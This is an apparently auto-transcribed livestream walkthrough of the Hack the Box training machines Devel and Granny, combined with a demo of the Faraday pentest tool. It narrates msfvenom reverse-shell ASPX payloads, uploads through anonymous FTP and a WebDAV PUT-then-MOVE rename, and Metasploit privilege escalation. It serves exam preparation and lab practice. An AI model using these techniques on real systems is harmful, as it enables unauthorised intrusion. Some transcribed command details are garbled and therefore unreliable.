All right. Let's see if we're live. Let's see if we can get some feedback from the channel here. Hello. Can everybody hear me? Can anyone hear me? That's the important thing. Chat, hello. Awesome. Okay, cool. I guess there's probably like a 30-second delay or something on the stream, but sounds like we're here. Cool. So let's see what we're doing tonight. I'm going to do a little bit of hack the box. If you follow Twitter, you'll know that we're going to do the Devel and the Granny boxes. The intention is that I'm going to show off a little bit of Faraday functionality. If you're not familiar with Faraday, it's a kind of pen test. They call it an integrated pen test environment, but it's like a collaboration suite / information consolidation kind of a tool that I've been. Hello, Silver Rose. Kind of a tool that I've been playing around with, thinking about using for my team at work. And additionally, it kind of helps me swap computers without losing a bunch of notes and stuff. So I'm not fully fluent in it yet, but I just kind of wanted to share some of my findings and share some of the cool stuff you can do with it. And then the second box that we're going to do, I'm going to try and do sans automated exploitation. So the OSCP and stuff like that prevents you from using like Metasploit or PowerShell Empire, maybe not PowerShell Empire, but back when I did it, definitely prevented you from using Metasploit to automatically exploit stuff. So we'll do stuff as manual as possible. I'll probably still use Metasploit, the multi-handler, just because it's super convenient. And that's totally legal as far as the OSCP is concerned. So no worries there, but we'll try and manually exploit everything and kind of see how that goes. The reason I'm a couple minutes late is I was actually having trouble getting the test exploit working. So we'll probably like fly by the seat of our pants here. You might have seen me trying to reset a couple boxes if you're paying attention to the VIP VPNs, but so here we go. Let's get started. Let's get started with Faraday and Devel here. So I'm going to throw up the Faraday IDE, and it spins up this box. And if you can see on the right here, so what I have set up previously is I installed the Faraday server on this little server, actually my Plex server that I use for Plex at home. And what it allows me to do is I can connect to it from either my workstation here that I do my streaming from, or my laptop that I actually do most of my work from, and kind of go back and forth, uploading reports and whatnot. But this is the IDE. There's a few things here. There's a shell, obviously, and you can spawn new tabs if you want. There's a new workspace, which are these things over here. I have a couple workspaces set up. This is the workspace that I do like my pre-work from. If I do like, testing out a new box for a possible stream later or whatever. This is the actual stream workspace here. And then I set one up for Holiday Hack Challenge, but I haven't had any time to do Holiday Hack Challenge this year. Hopefully I'll get some time over the next week or so to play around with it. Then there's the web interface, which we'll check out in a minute. But from the shell, the shell has some built-in commands. You can do things like Nmap. You can do things like dirbuster, I believe. Yeah, dirbuster or dirb if you want. The cool thing about it is, let's find out we're working on Devel, right? There it is. So 10.10.10.5. So the cool thing about it is that you can, if you just type in Nmap and 10.10.10.5, whatever command you end up doing, as long as it has a plugin for it. Why am I still in? That's the wrong workspace. This is the right workspace. Weird. Okay. I guess you can have different tabs in different workspaces. But so we'll say we'll do Nmap 10.10.10.5. Now, we haven't started working on the box yet, obviously. I'd have some other flags to use, but just to kind of illustrate built-in commands. If you see, it automatically changes what you're doing. So it adds this OX. It uses XML report formats to get stuff into Faraday. And so it automatically adds the output XML format off to its own file, and then it puts automatically adds standard error to standard out, and then it tees everything off to this temp file as well. So from here you can see that it's got port 21 and port 80 open, which is interesting. So if we go into the web, if we go into the web, it starts kind of populating this web interface with some information. So we see there's one host and two services up. We can go over to the hosts and it shows us 10.10.10.5. We can see that there's port 80 and port 21. Something cool that this will do, and I don't really want to open up. OpenVest takes a while to install. I don't have it installed on this machine, but maybe I can see what we got in the pre section. All of the pre stuff might be if you can see here, hopefully this isn't displaying any actual yeah, I'm not seeing any I'm not seeing any spoilers here, but this actually has some boxes populated in it. I have two different hosts. There's 8 vulns between them. It kind of does this cool categorization here where different vulns are worth different money, different money amounts, and you can configure that. It's all just kind of executive reporting kind of stuff. But what's neat here is that it'll start categorizing different types of vulns and then actually consolidate vulns from different tools. So if you run like Nikto and Nmap and OpenVast against a single target, you'll get, it'll start consolidating the vulns and showing you the vulns from all of the tools. So we'll start working through that because I believe Devel has some web components to it. So we'll start working on that. This shell is one way to interact with Faraday. Personally, I like tmux and I like working in my own environments, and most people have their own workflows that they kind of deal with. So I don't actually use this web shell very often. What's cool is you can, let's minimize that. What's cool is that you can click here and open up the plugin select. And these are all the plugins that are available for free. You can request new ones be made, or you can write your own or whatever. But generally what will happen when you click one of these things, we'll click Nmap in a minute to import like my actual Nmap scans. But if you click that, it'll ask you to start uploading stuff. So when we get to that point, you'll see it. But that's another way to get information into Faraday. So let's go into CTF, hack the box, and we're going to make Devel. Okay, and then we're going to get my terminal set up here. HTTP Devel. Okay, so let's do an Nmap, a real Nmap this time, and we're going to do all ports. 10, 5, and we're going to all output formats, and we're going to call that a full port scan. So what I've been doing lately, and I think I covered this in my last video, is when I attack a new box, I do a full port scan to see if there's any like wacky ports. A lot of times CTF or boot to roots will have wacky ports open to kind of get you. So I scan all of them, and then once I find out what ports are open, then I'll do the scripted scans against specific ports, and it tends to finish faster. And one thing I'm going to start doing now is I'm going to use -v since we're doing all this live. -V is verbose, and it'll tell us new ports as they pop up. That way we don't have to wait for the full scan to finish before I can move on in the video. So as you can see, it's already told us the 21 and 80 are open. So now it's doing, all of its extra scans like OS fingerprinting and stuff. But we can move on knowing that. So we'll run Nikto host OSCP 10.10.10.5, and we'll output that to nikto.txt. And then what else can we run? Let's just run dirbuster. We don't actually need dirbuster for this box, but I want to run dirbuster just to give some more input into Faraday, and we can kind of see how it deals with all these different input types, right? So we'll run that against 10.10.10.5, output devel.derby. Actually, this is one thing I don't like about Nikto, but in the output formats, Nikto requires you to do a .txt, which bothers the shit out of me. So Silver Rose asks, what's the objective here? So there's two objectives. One, we're going to own the Devel box. So in the essence, or in the objective of owning Devel, I'm doing my standard recon. I'm doing my Nmap across all the ports. I know there's a web server, so I'm also running Nikto, which is a web vulnerability scanner. And then also a standard thing for like hack the boxes to run derby or dirbuster or some directory guessing tool against it to see if there's any like additional directories that we should be paying attention to. The secondary objective is to run a bunch of tools against the box so I can show off a little bit of functionality of Faraday that I was talking about earlier. So let's see. Nikto isn't getting much here. It's found some whatever methods. It's not that big of a deal. We already knew that 20 and 80 were open here. Derby has found something interesting, but yeah, Nikto is Lelouch says that Nikto is a noisy tool. That's absolutely true. I've mentioned that in previous videos. If you're trying to be stealthy or, if you're not on an actual engagement, I generally wouldn't run Nikto, especially not right off the bat. Against like hack the box or in CTFs or boot to roots, generally the objective is to solve things faster. So you can cut some corners and run things like Nikto, or not have to slow down your Nmap scans or whatever, just to recon faster. So yes, Nikto. I guess in summary, Nikto is a very noisy tool. So now that we know that it's only port 21 and 80 that's open, we can run an Nmap scan against just port 21 and 80, and we'll run the default scripts, the default Nmap scripts. It's 10.10.10.5, and we'll output this to all formats. That's what -OA is all formats. There's 3 different ones. Generally, I like to use the .nmap, which is really just this output, and then also the .gnmap, which is a greppable, like each host is on one line. There's also the XML format, which isn't used often unless you're importing it to Metasploit or, in this case, Faraday. So I generally do my OA. We're going to call this like targeted scripts, and we're just going to let that run. So right now, Derby found a directory. Nikto did its initial checks, and right now it's running something similar to Derby, so we're just going to Control-C out of it. We don't need it to do the same thing this is doing. But Nikto will do things like it looks for all the headers, and then it tries to guess what methods are available, and then it'll do things like checking for common modules, so like PHP plugins that are installed, or Apache plugins that are installed, or whatever. And then once it's done with all of its exploitation checks, or its general vulnerability check, it'll start doing like a mini derby. So if you see Nikto ever just sitting there for a while, it's probably running through its directory guessing, and you can just Control-C out of that unless you really want that info. But we don't. So we can, over in our Nmap scripts output, we see a few things here. One of the things in the default scripts that it runs is since it found a FTP server, it sees if you can do anonymous logins to FTP, which you can. And since it could log in, it just does a quick dir against the home directory, shows the output. We see a welcome PNG, an IIS start.htm, and an ASP.NET client directory, which, if you're familiar with IIS, which I am totally not, but I'm familiar enough to know that IIS start is sort of like the Apache It Works page. It's the default, this hasn't been configured page for IIS. And another interesting thing is that we see this ASP client.NET. And if you look over in our dirb window, dirb also found an ASP.NET _ client directory. So we're starting to get an inkling that perhaps the FTP home directory, the home directory for Anonymous, is actually the root web directory for this server. So that could be a pretty significant tip on what our exploit path is going to be. Also here, going back to our scripts, it pulled some headers, some information about the web server. It also detected that trace is there. It's guessing that it's running Windows 8 or Vista or 2008 or something like that, but it doesn't really know. So anyways, let's go back to Faraday for a minute, because we have some stuff to pull into Faraday, right? So, and actually we can, I guess, yeah, we can close out of this. This was already on you, but we don't need this to finish. So going back into Faraday, let's import some of this stuff. So we can import Nmap, Nmap, and then we'll OK. We'll go to Documents, go to Home, CTF, nope, CTF, hack the box. Actually, let's just do this. What did you just import? I don't even know what you imported here. So Nmap, OK, go home, CTF, hack the box, going into Devel. We're going to bring in, oh, wait, nope, that was not, damn it. So as you can see, it's a little clunky. It's kind of, you have to go through this roundabout way to import like every file. So we're going to bring in the targeted scripts because we don't really need the full port scan here. The full port scan told us what ports we have open. This is the more interesting Nmap report. So we're going to import the targeted scripts. Then we're going to, let's see, we have some dirb input, home, CTF. I kind of wish it would remember what directory you were in. We'll bring in the dirb input. And if you see under hosts, we're starting to populate. So there's a host called 10.10.10.5, and you see this little 5 thing next to it. And if we look, that means they call them vulnerabilities, but it's really just information things, right? It's not necessarily a vulnerability, but little bits of information. So we have 2 under FTP, which is that anonymous login is allowed. And then we've got this syst, which I actually don't know what it's trying to tell us here. Status opened. And I'm not really sure what that's saying, but this is at least telling us anonymous login is enabled. And then under HTTP, it's telling us here's the methods available. We've got some headers, showing us that it's IIS 7.5. There's the website title. So we can bring in Nikto, which isn't going to tell us much more, right? Home, CTF, HTTP, Devel, Nikto.txt. That's still not telling us anymore. Okay. Well, that's fair. Maybe it doesn't want to tell us more. But if we look here, now we've got some stuff populated in our stream workspace, right? Here's our host. We've got 2 vulns, and it's really just the same information here. But what's cool about this is that we can, if we're working in a team, we can all be working in this stream or in this workspace. And while I'm hitting one box, my coworker can be hitting another box and, passing vulns back and forth and saying, hey, I got this output. Can you take a look at it without me having to copy, a bunch of shell output to them or whatever. So it's just an interesting way to work. As we work through the rest of this, we'll kind of hopefully get a little more and show a little more functionality. But for now, we kind of know what's up. We know that that this is probably the web root for Devel, right? So let's spin up MSF console. And while that's spinning up, we're going to use Msfvenom to output a payload. Okay, so we can tell by this header that it's using ASP.NET, which means that we're going to want an ASPX payload. So we're going to payload Windows interpreter reverse TCP, and we're going to do lhost is config 14.16. So 14.16 is my VPN address for Hack the Box. L port 8910. And format is going to be ASPX. And we're going to direct this to toteslegit.aspx. While that's generating, we're going to go back to Metasploit. We're going to use exploit multi-handler. We're going to set the payload to Windows interpreter reverse. I hit tab. Reverse TCP. I set lhost to ton 0. If you haven't done this before, if you haven't seen this done before, pay attention. You can set lhost to an interface, which is amazing because you never have to try and remember what your IP address is again. Set the L port to 8910. Set exit on session to false. And we're going to exploit as a job. So it's just running in the background. So I can kick as many shells to it as I want. It's not going to exit when I close any of the sessions. It's just going to live on forever until I tell it to stop, which is nice. So we've got our shell here as totes legit. We've got our handler running here in this other window. So we're going to FTP to 10.10.10.5. We're going to log in as anonymous. And then any password, they ask you to put in your email address. That's a common default thing, but really just I think it's any. Yeah, anything. So if we do a dir, here is our information again. This is what's going on in the main page. So if we just open this up here, let me resize this. So if we go to 10.10.10.5, whoops, burp's not on. Let's get the free edition going. So, but when you set lhost to interface, sometimes it doesn't apply till you redo it. So I think what you're referring to, so that was a question. I think what you're referring to is if you're using a exploit that will auto set a payload, and then you hit run, it'll set it to say ETH0 by default instead of ton 0 if you're doing hack the box. That's absolutely true. So you can do one of two things. What I've seen IPSec do a lot, which is a fine thing to do, is just run it and then Control C out of it real quick, and then set your set your interface to ton 0 or whatever you want to do. The other thing is you can just manually set what payload you want. So just like I went in here to exploit handler and then I set my payload manually, you can do that to any exploit. So when you set your exploit, and we'll show this in a second, but when you set your exploit, get your exploit all set up, then you can set payload to the payload you want, and then you can set interface to, or you set lhost to ton 0 and everything, and it'll work the first time. But yes, that is something you have to pay attention to, because it'll kind of mess you up, especially if you're not looking for it. You'll like run an exploit and it won't come back, and you're like, why did that happen? But I'll show you. I'll show you that in a sec. So so we're just confirming here that this is the that this directory is there. So if we do start.htm, there's the page. We can do welcome.png. There's just that. So this is a good indication that this is the that's 403, but it's a good indication that this is the actual web server. So what we want to do is put totes legit.aspx there. And close my connection because I waited too long. Anonymous. Any password will do. We're going to put totes legit.aspx there, and it's there. Just confirm that our listener is listening. And we don't have to do this in a web browser. We can just do a curl http10. Yep. Curl is a command line like web client, or HTTP like URL client. So totes legit.aspx. Yeah, so Lelouch says it did mess him up and wasted 25 minutes wondering why the exploit didn't work. That happens to me a lot, and not just when I forget to set the interface. It's important when you're using Metasploit. You can get caught up just kind of like whizzing through stuff. It's important to kind of keep your head screwed on straight and be watching the output that it's giving you, because 9 times out of 10 your exploit will work just fine. You're just missing a key bit of output. Yeah, I've been there, man, especially like 2-3 o'clock in the morning when you've been working for 18-19 hours straight. It's easy to miss that kind of stuff. So we're going to curl the shell that we uploaded, and we can see over here that we caught the connection. We got the reverse shell. So if we run sessions, and we'll interact with session 1, you got a get UID, where the standard web. So this would in Linux, this would be www-data. Here it's app poll web. So we can also do sysinfo just to kind of see what we're dealing with. We're on a Windows 7 machine. Nobody else is logged on. Interesting. So just in the name of killing this box, let's we're gonna background out of this. We're gonna search for what's it called? It's like exploit suggester. Yeah. So this is just a post module that can help you do post-exploitation enumeration easier. I don't like using it a lot. It seems to be less reliable on Linux systems, though it's pretty reliable on Windows systems. But again, if you're in a CTF or boot to root or something that you're just kind of blazing through to get points or whatever, this can help you cut some corners. It's certainly not an end-all be-all. You need to know what it's doing. You need to be able to enumerate well outside of this, but it helps. So we're going to set if we show options, I'm going to set the session to 1, and we'll just go ahead and run that. Let's see. Sometimes I wish Metasploit had tmux. This would be fun to kind of, like, while this is running, we could, poke around the system and do some enumeration. But so it found 38 possible exploits based on, it checks what version the operating system is, what its patch level is, what its, if it's x64 or x86, that kind of stuff. And it found a bunch of stuff. So kit trap, the service is running, couldn't be validated. These ones that actually tested, so this should work. So it just gives you a list of exploits that you can try, Metasploit exploits you can try. Alternatively, you can run this but not necessarily use Metasploit, right? You can, use Searchsploit on your own box to just be like, okay, well, what about MS10015? So we'll do a search for this. If you're not familiar with Searchsploit, Searchsploit is basically, I want to say literally, but it's not quite literally. It's basically exploitDB on your computer. So if you have Kali, you already have this as built in. It gets updated with apt update / apt upgrade. So it's constantly up to date, and it's basically a mirror of exploitDB. So you can just do Searchsploit, and it'll come up and it'll let you know, like, hey, there's a local version of this exploit for you. So you can less user share exploit DB platforms Windows local 1.9.txt. So just to read this output here, here's the name of the exploit and its description. This is the path where all exploit DB stuff is, and then here's the the subpath or whatever. What I do, I don't have this set up on my desktop, but I usually set a symlink to this. So I'll symlink, user share exploit DB platforms to /sploit or something. So I can just copy this, do /sploit, and then paste it, or it's less for me to type. It's a good shortcut. But basically, here's a write-up for this kit trap exploit. So anyways, this is another thing you can do. If you find something in Metasploit but it's not working quite right, or you just want to do it differently, you want to check out the exploit before you run it, you can find it here typically. So we're actually going to use this one. So we'll use this. So if you do a show options, it just says set your session, right? And you can set the session to 1. Now, what we were talking about earlier, what Luch was alluding to earlier, is that if you just exploit this now, it will automatically pick an appropriate payload and then run it with default settings. So it'll be, whatever your default interface is, which is probably going to be ETH0, and then the default port, which is 4444 for, most Metasploit stuff. But you can actually set the payload manually if you want. So we can set payload, and if you actually double tap tab, it'll show you all the appropriate payloads. Notice that it's not showing any Linux payloads here. It's just showing like a couple generic ones and a bunch of Windows ones. So it's smart enough to know, if we scroll back up, smart enough to know that since the target here is Windows 2K through Windows 7 x86, that it'll only pick, payloads that fall in line with that. So we're going to set our payload to Windows. We'll just use the same one. Reverse TCP, and we'll set our L host on 0. We'll set our L port to not 8910. Let's do 7891. Sure. And then we'll exploit. So actually, before we exploit, so show options. So this is more what it would look like afterwards, right? After you tried to run it the first time, it would show you, the L host was set to, 192, whatever your address is. We just entered, we preempted that and did it manually. So we'll go ahead and run exploit here. Injecting into DLL. Wait for privilege. Interesting. Did that break? I would say this is why you test things before you do a stream, but Literally just did this. Okay, well let's kick off the shell again. Somebody bounce the box. No, nobody bounced the box. Did I just crash it? Awesome. Oh, what? Hey, it looks like they're allowing some of the looks like they're putting some of the retired boxes up for free. So if you didn't tune into my last stream, it was a couple weeks ago, I did Blocky. So it looks like Blocky is available for free right now. If you don't have VIP, you can go back and watch the video and follow along. I really liked Blocky, actually. That was a fun box. So where is Devel? Status check that. Huh. Yeah, that's funny. I didn't... Demiskeleton said that the exploit crashed the box for him as well, and he had to run it again. That's interesting because I literally just did it earlier. It's back up now. So let's get our shell back. So now we're on session 2. So here we are. So we can do sysinfo. If we drop into a shell, is it like, I always forget. I'm really bad with Windows. I actually kind of wish I would have picked some Linux boxes for tonight. But Windows system information CLI. I think it's like get sysinfo or something like that. System info. Yeah, there we go. So this gives a little more. Oh, Ipsec's in here. What's up, man? Ipsec says the last 2 retired boxes are free. Neat. I've never seen that notation before. Is that a new feature? Anyways, so I was mentioning earlier we can do a little bit of enumeration ourselves. So this is a good start, right? It shows us a little more detailed information about the box we're on, what type of processes we're using, the actual OS according to the system, and how much memory it has. You can even see the hotfixes, which this doesn't have any, that kind of stuff. So exit out of here. Let's search up for suggester. It's always been that way? All right, Ipsec says it's always been that way. I am oblivious then, which is, par for the course. Let's try this one. Just because I don't want to crash the box again. Nope. So if we do our show options again, so we'll set the payload ahead of time so we don't run into that IP problem again. We'll set our payload to Windows. Yeah. Set L host to 10.0. And we'll set our L port to 891. We're on session 2 now, yeah? Oop. I can totally type. There we go. System cannot find the file specified. So it uploaded here, and then what did it do? Oh, the icon's new. Okay. Yeah, IPSec said the icon is new, and then whenever the 20th box retired, a page got updated. Okay. So yeah, so I guess the retired boxes, the two recently retired boxes have always been available for free, but the icon to the VIP side is new, or to the retired boxes are new. So this here, these guys. So neat. That's very cool. Let's see here. See if we can read about this. So let's see what the error was. So the task XML contains a value which is incorrectly formatted or out of range. I wonder if it doesn't like this payload or this. Let's do this. Let's unset the payload. And we'll set the command to who am I? What I'm curious about is if it was our payload that was getting in the way of that working, or if it works anyway, like if it works, but our payload was the thing messing it up, or what. So we'll just run like a simple command. And if that returns, then we can move forward with troubleshooting. If not, then we can try something else and not waste a bunch of time. So I don't want a handler. Why did you do this? Yeah, see, this is having problems regardless. So maybe that's meant for a different version of Windows 7. That'd be weird, though. I don't know why that would be true. Maybe we can try this again. Maybe it'll crash it again. Who knows? It's the one I used when It's the one that I used when I tested this, like, what, an hour ago? There we go. Okay, that actually worked. Oh, hello? There we go. Okay, so there's get UID system. So just to recap what we did. So we ran Nmap. We found that there was anonymous FTP going, and what looked like, at least according to our dirb scans, what looked like the web root, right? So we came over here. Oop. We came over here and we generated a Msfvenom payload that was just an interpreter, formatted as an ASP shell. And then up here, we logged in to the anonymous FTP, uploaded the ASP shell, and we curled that ASP shell that we uploaded. The server executed it, and that's what gave us our shell here. Then we backed out. We backed out of the interpreter session, used exploit suggester to do some automated enumeration on the box. Bah, why did it do that? to do some automated enumeration on the box, which came up with these exploits. We picked the first one, ran it, crashed the box, ran it again. It worked fine. The interesting thing here is, let's see, system info. When we ran system info, we saw that there's basically no hotfixes. There's no KBs attached to this system at all. So pretty much any prevesc associated with Windows 7 should have worked. So that's Devel. And so we can start Granny now. So Granny was a fun box. I actually really enjoyed Granny. It's similar in that it's a web-based exploit path again. So we will start off with our Nmap of the full ports. What's Granny's IP address again? Granny is 15. 15 OA full port. V. And we'll do, lo and behold, 80 is open, so we'll just get dirbuster going as well. So as things are moving along here, we see once again that it's IIS, this time 6.0, which is interesting. That's older than the one we were just using. With ASP.NET again, so likely whatever shell we come up with will be, an ASPX. Looks like dirb is hitting some interesting stuff already. We got this VTI bin, we got underscore private, just a bunch of stuff coming up here. We've also got our last one didn't have put. No, we used FTP to put our shell, but this one actually has put allowed, which is interesting and always fun. Does Faraday let you import system info from IPsec? That's a good question. I don't think so. What it does do, where's Faraday? What you can do at the host, oh, here. So we can put it in description if we want. We can change the operating system, add host name. Let's see if it has. I doubt it has a plugin for this, because it's OS specific, whereas these are all just tool based. It doesn't look like it, but you could, like I said, you could paste it here if you want. I actually had an email back and forth with the Faraday people, and it seems like they rely on this description setting pretty heavily. You can also do stuff like this in the edit. You have a bunch of notes that you can put. You can do the same thing with the vulns, I believe. So this vuln here, you can put in data, your proof, you can upload evidence and stuff like that. So that's kind of how they, that's what they rely on for customization, unless you want to write your own plugin. The way that came up with them is that I'm looking for a keep note plugin or something where I can just upload my keep note to a host. Because frankly, this is a little clunky. I don't really like having to go into that and then using their fields. I'd rather use my own fields. So overall, I'm still kind of iffy on Faraday. I really like. I wish I would have done some prep work in the actual stream workspace, in the pre-workspace where I've got some non-retired box work. What's really cool the thing that I like most about Faraday is the ability to consolidate reports from different tools. So like here we have, we've got information from both. Did Nikto actually import anything now that I think about it? Maybe you have to let Nikto like actually finish, which would be unfortunate because letting Nikto finish takes forever. There's almost no reason ever to do that. Oops. Or you can just background it like an idiot. Yeah, there's almost never a reason to let Nikto finish. I guess I'll let it finish this time, and I'll let dirb finish and then show kind of how that works. But really, like, you get a vulnerability called directory listing, and then it lists all the directories that it finds. But yeah, it's really the consolidation of information from different tools that's kind of nice. So like if I took the time to set up OpenVAS and then run like the OpenVAS information, what host do I have in this other workspace? 15 and 63. Wait, 15 is Granny, right? I can show that, can't I? I can computer. What happened? Granny, it is 15. So yeah, let's show that. Oops. Yeah. So so hosts 15. So the one thing that's interesting is that it seemed to pull. Is this a directory listing? So it pulls the directory listing as a separate vuln. Why won't you show me the actual directory listings? Here's the directory listings. So it pulls the directory listings as a separate vuln. If we go back to everything else, this is the output of Nmap, Nikto, and dirb is kind of what's going on here. So we've got end of life IIS version, I believe, is from OpenVAS. Dangerous methods is probably also OpenVAS. Most of this is probably OpenVAS actually. I think this is Nmap output. Yeah, Nmap output. This is probably Nikto would be my guess. So the consolidation's nice. It's better than nothing, let's put it that way. Okay, so we've got Nikto still going because it does that. We've got some various front page and IIS default directories, which we kind of already knew. But what's really important is, excuse me, this. So having put is super dangerous. Like being able to upload arbitrary stuff to a web server is insane good for us, insane bad for the actual web server. So from here, let's go ahead and we're gonna boot up our handler. We're gonna Msfvenom, and again, it's the same thing as last time, right? We got a ASPX payload, so we're gonna Windows interpreter reverse TCP lhost is 10.10 14.6, I think. You can stop Nikto. 16. We're gonna do lport is gonna be 8, 9, 10. format is ASPX, and we're going to put that in totes legit.aspx. Use exploit multi-handler. I really should just like put together a .rc file for this crap. Host 10.0, set L port. Oops. Set it. All right. Whoa. Oh. The we should probably bounce Devel so it stops reaching out to us. Or I guess we could have cleaned up our shit. That would have probably been a better way to go. Yeah, let's. Okay. Anyways, okay, so we've got our handler going. We've got a payload, so we're going to curl. And so curl, instead of having to do like the full put, it's actually got a, let's call it a macro called upload file that kind of sets up put for you. But so we'll upload file totes legit.aspx to 10, 10, 10, 15. Oh no, it doesn't work. What's it saying? It says the page cannot be displayed. Let's get the headers. We got a, so minus I shows the headers. Minus capital I only shows the headers. But so we got a 403 forbidden. So we're allowed to put, Nikto said that we're allowed to put, but we're not allowed to put that, is the way I'm reading this. We got a 403 forbidden. You can't put this. Now, is that because Windows is detecting that we're trying to upload a shell to it? No, probably not. It's likely has to do with the extension. So what happens if we copy totes legit to totes legit like HTML? We get the same thing. Oh, no, that seemed to work. So can we curl HTTP 10, 10, 10, 15 totes legit.html? Yeah, so it's clear that we're able to upload our shell. We just can't as an ASPX. I mean, that seems reasonable, right? They don't want us uploading like dynamic code to their web server, right? Now, that would be a good protection, except except in our Nikto output, we not only had put, but there was also move. And what move is it's sort of like copy or rename, right? So you can copy or move on the web server itself. So let's see if that'll work. So the way move works is curl. X is how you set which method you're going to use as curl. So we're going to use the method of move. We're going to set a special header, which is capital H, destination. Okay, and the destination is going to be from the root of the web server. We're going to say we want it to be toteslegit.aspx, and the target that we're doing is 10, 10, 10, 15 toteslegit.html. Okay, so basically, just like in Linux or Windows or whatever, here's our origin. The destination we set through a header. So we're renaming toteslegit.html to toteslegit.aspx. Uh-oh. I didn't do anything to it yet. Okay. Somebody bounce it. Nope. Come on. Poke, poke, poke. It says it's up. It is not pinging. I have connection. Okay, now I can ping it again. Is my toastlegit.html there? No. Okay, so we're gonna re-upload toastlegit.html. Okay, it worked. 201 created. So we created our toastlegit.html. Now we're going to use our move method with the header destination to toastlegit ASPX. So we're moving toastlegit HTML to toastlegit ASPX. And we didn't get any feedback, so that probably worked. I actually forgot to use -i for the headers again, but it seems like it worked. So if we curl toastlegit.aspx, boom, and now we have a session. So let's, again, just kind of walk through what happened there, because I don't know if I was... So here are the methods allowed. In that we have put, which is kind of an upload or create method. This allows us to take a file and actually upload or create a new file on the web server. So we were able to put an HTML file. We weren't allowed to put an ASPX file. This means that they're expecting us to be able to create resources on the web page, but they don't want us to be able to upload shells, basically. They don't want us to be uploading dynamic content, executable content. But since they have move and probably copy, actually that's a good idea. Let's curl x copy. Let's find out how this works. I've actually never done copy, so I'm going to assume it's the same syntax. So we're going to call it toastlegit. Actually, let's call it toyslegit. SPX. I didn't like that. How does copy work? Just do a net statistics server once you pop it to see if it rebooted. Okay, I'll do that. Actually, I have it popped right now. What? Oh. Nope, don't want to do that. How do you do time on a server? What? No, come on. That can't be. Oh, type time? Oh, okay. So 206? Might have just been the, yeah, it rebooted. How do you know that? Where does it say? This says 103, current time is 2:06, so that'd be an hour. Unless you're just basing that on the fact that there's no metrics here. Yeah. Yeah, so I don't know. Yeah, I don't know. It didn't. Maybe just somebody bashed open the web server. I know I didn't, because all I did was like make a couple requests, but somebody did. Anyways, let's figure out this copy. I'm curious about copy. So curl copy method. Yeah, that should have worked. Oh, I wonder if it's just the move that's messed up. No? 403 forbidden. Weird. Huh. Okay, well, the copy is, maybe I need some time to figure out like why that's not working and get it to work. Try to specify the full path, like with the full server and everything. So it still doesn't like it. You've attempted to execute. Is it because? So, I think I know why. Okay, so it might just be the so copy is protected against running against ASP files. Let's see if it'll let me copy this into an ASPX. Yeah, interesting. So copy will not let you do like create an ASPX file. It will let you just do benign files. Move is the one that's really messing the server over. That's cool. Okay, so here's the stuff that I didn't get working in the when I was testing ahead of time, and that is doing the privesc manually. So let's see if I can get this working. So we're going to, let's do some enumeration first. So we've got a get UID, who are we? We're network service. What about sysinfo? Okay. So we're running on Windows Server 2003. We've got one hotfix installed. Okay. Oh, was this automatically applied in the service pack 2? Maybe. We might. There might be a exploit to try right off the bat. Where they actually, it's 1180. Mention learn shellcode. Oh. Oh, I see. So it takes the padding of 2? Really? Okay. Okay. Well, the uh Vibhisha is asking, I'm sorry if I butchered that, if I'll upload after finishing. Yeah, all of my videos get archived back to YouTube. So even if you miss the stream or you miss part of the stream, then they'll all be on YouTube afterwards. So definitely, definitely, study for your exams and get some sleep. This is way more important than watching me bumble around on the internet. Okay, so this might work. We've got, so basically it looks like pretty much anything against Windows 2003 Service Pack 2 will work. So what we can do is go back to our Searchsploit. So Searchsploit, Win2K3, SP2, priv ask, let's see if we see anything here. Nope. when did the stream start? This stream started an hour and 17 minutes ago. So 1800 my time, Pacific time. Let's see. So we got two possible ones here. We've got. It looks like this is the one that I was just looking at. Yeah, that's that PI file I was just looking at. Windows DOS. Let's so first of all, let's set up. I like the fact that I do this on my other system. So we're gonna lns, which is creating a symlink. And if you, like me, back in my younger days, always got confused by the ln syntax, it's just like copy. It takes a little bit of perspective to figure it out, but the way it works is you do ln minus s, and then it's the source and then destination, right? So the source is where the actual thing you're linking to exists. So user share exploit db platforms, and then where we're putting the link at, right? So the destination, we're just going to call it /sploit. So the way it's going to work, wait, source and destination. Did I totally mess that up? Yes, I did. I got those backwards while I was trying to explain this to you. So source is the where the link is, where the link is at, and the destination is where that link is going to, right? Share exploit db platforms. God damn it. Yes, thank you. Okay, so now if we ls minus al, or actually we can just do l. Yeah, L for sploit or slash. Wait. What is happening here? What is happening here? Why am I being dumb? Okay, brain. Let's walk this back a little bit. So /user. I think I had it right the first time. I think the trailing slash is what messed us up. There we go. Yeah, it was the trailing slash. I'm dumb. So let's try this again now that I've thoroughly confused people that were already confused, and also myself. But so the source is where we want, you know, the actual thing that exists, and the destination is the link that we're putting in, right? So what just happened there? There we go. So we want to link this here. So all we have to do is type /sploit. So if we ls l slash, now we see sploit and it links to there. So going back, way back to this, so now we should be able to copy and then /sploit. And then what were we going to look at? We were going to look at, was it this one? Yeah, this is what we were looking at on the internet. So we'll just copy that. Oop. Copy that over here. So here's this this Python application now, and I don't have this set up on my current box, but there's a way that you can. Oh wait, that's a Windows thing. We're kind of getting in the weeds here. Python to exe Linux. So we are in completely unexplored territory for me. So you're learning with me now. Let's see. Python programs portable to multiple operating systems. Blah blah blah. Python to C++ code compiler. You can download it from the official site. Just press the download link. Okay. Remember, kids, never install random shit onto your computer. Oop. Dependency problems. Leaving unconfigured. If we, what's the apt and like local install? Is it just local install? Nope. I don't want. GDebbie? What? Man, I've never done any of this crap. What? That is the name of the thing it said, right? Yeah. Ugh. I swore there was like an apt like local install though. Oh, if we do an apt update, does it? But apt install f isn't gonna. So the comment is try apt install f, but f is just force. Like you can't. Oh yeah, I'll be damned. Thank you. D. Who is this? Thanks, D. Apt install f. I've never actually tried that. And then it just straight works. Cool. Okay. Neat. Okay, before we begin, Python application. Want to compile a Windows exe. Wait. Windows version and compile it. Did I download the wrong one? Yeah. Let's see here. Do I have anything on here? Okay, let's do this. I want to do this in Windows. That seems like a faster way to do this. So we're going to, what's it called? This? Yeah. Oop. If I recall correctly, that if I recall correctly, this was 2.7, I assume. I'm going to assume 2.7. Actually, it's probably not 2.7. It's probably 2.6. I don't think it'll matter, though. I think it'll be fine. It wants me to install Python. Of course it does. I thought I have Python on here. Maybe I cleaned it out. Yep, looks like I cleaned it out. It's okay, I can fix that. Literally any minute now. I should probably... You there. Oh, good. I already have it turned off. Don't do that, by the way. Don't turn that off. It's very much a do as I say, not as I do. Where? Why didn't that launch? There it is. Launched on another screen. I have a lot of screens. Sorry about that. So the reason that we're doing this, just to recap, the reason that we're kind of going to do all this manually rather than just using Metasploit is that is what's required on the OSCP. You can't use like 